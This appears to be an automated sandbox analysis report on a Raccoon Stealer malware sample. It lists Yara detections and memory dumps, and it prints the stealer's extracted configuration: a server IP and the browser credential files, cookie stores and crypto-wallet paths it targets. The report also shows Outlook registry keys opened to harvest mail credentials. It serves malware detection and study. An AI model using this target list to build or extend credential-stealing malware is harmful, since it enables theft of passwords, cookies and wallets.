Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp String found in binary or memory: {"_id":"45FBKXwB3dP17SpzZps0","au":"/l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67","ls":"/l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1","ip":"185.189.150.72","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8001,"latitude":47.3664,"longitude":8.5546},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":0,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Must
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality:

Yara detected Raccoon Stealer
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124, type: MEMORYSTR